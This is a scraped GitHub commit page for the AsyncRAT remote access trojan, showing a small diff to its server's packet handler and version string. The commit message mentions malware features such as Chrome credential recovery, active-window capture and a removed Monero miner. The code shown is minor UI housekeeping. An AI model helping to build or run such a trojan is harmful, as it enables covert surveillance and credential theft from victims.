Skip to content

Commit

Permalink
Update Packet.cs
Browse files Browse the repository at this point in the history
removed xmr miner
added get active window title
updated chrome recovery
added feature change wallpaper
fixed listview when error occurred
  • Loading branch information
Nyrotication committed Mar 26, 2020
1 parent fd05091 commit 9f29559
Show file tree
Hide file tree
Showing 2 changed files with 5 additions and 1 deletion.
4 changes: 4 additions & 0 deletions AsyncRAT-C#/Server/Handle Packet/Packet.cs
Original file line number Diff line number Diff line change
Expand Up @@ -85,6 +85,10 @@ public void Read(object o)
case "Error":
{
new HandleLogs().Addmsg($"Client {ip} error: {unpack_msgpack.ForcePathObject("Error").AsString}", Color.Red);
lock (Settings.LockListviewClients)
{
client.LV.ForeColor = Color.Empty;
}
break;
}
case "remoteDesktop":
Expand Down
2 changes: 1 addition & 1 deletion AsyncRAT-C#/Server/Settings.cs
Original file line number Diff line number Diff line change
Expand Up @@ -19,7 +19,7 @@ public static class Settings

public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.5.6A";
public static readonly string Version = "AsyncRAT 0.5.6B";
public static object LockListviewClients = new object();
public static object LockListviewLogs = new object();
public static object LockListviewThumb = new object();
Expand Down

0 comments on commit 9f29559

Please sign in to comment.